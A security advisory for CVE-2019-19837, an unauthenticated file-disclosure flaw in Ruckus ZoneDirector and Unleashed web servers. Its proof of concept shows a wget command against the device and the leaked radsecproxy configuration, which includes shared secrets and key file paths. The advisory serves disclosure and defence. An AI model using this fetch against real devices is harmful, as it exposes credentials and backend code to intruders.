Information disclosure vulnerability

Aleph Research Advisory

Identifier

CVE-2019-19837

Severity

High

Product

- ZoneDirector - Unleashed

Vulnerable Version

- ZoneDirector: 9.9 and before - ZoneDirector: 9.10.x - ZoneDirector: 9.12.x - ZoneDirector: 9.13.x - ZoneDirector: 10.0.x - ZoneDirector: 10.1.x - ZoneDirector: 10.2.x - ZoneDirector: 10.3.x - Unleashed: 200.6 and before - Unleashed: 200.7

Technical Details

‘Embedthis-Appweb/3.4.2’ configuration file - webs.conf, lacks access control. An attacker can fetch any file from the /web directory, regardless of its file extension or type. web directory contains sensitive information such as backend code, executables, and symbolic links to /tmp directory.

Proof Of Concept

Example of information leakage from /web directory

➜  /tmp wget -q 192.168.0.1/uploaded/radsecproxy.conf
➜  /tmp file radsecproxy.conf 
radsecproxy.conf: ASCII text
➜  /tmp cat radsecproxy.conf 
ListenUDP               *:1815
PidFile                /var/run/tac/radsecproxy.pid
LogLevel                3
LogDestination          x-syslog:///LOG_LOCAL2
rewrite delSuffix {
    modifyAttribute 1:/^(.*)@(.*)$/\1/
}
tls default {
    CACertificatePath    /etc/airespider/certs/ca
    CACertificateFile    /etc/airespider/certs/cacert.pem
    CertificateFile    /etc/airespider/certs/webaccert.pem
    CertificateKeyFile    /etc/airespider/certs/webackey.pem
}
client 127.0.0.1 {
    type udp
    secret secret
}
client [::1] {
    type udp
    secret secret
}

Timeline

19-Sep-19
: Reported to Ruckus Product Security Team
24-Dec-19
: Patch
17-Dec-19
: CVE-2019-19837 assigned
31-Dec-19
: Public disclosure

Credit

waveburst of Aleph Research, HCL Software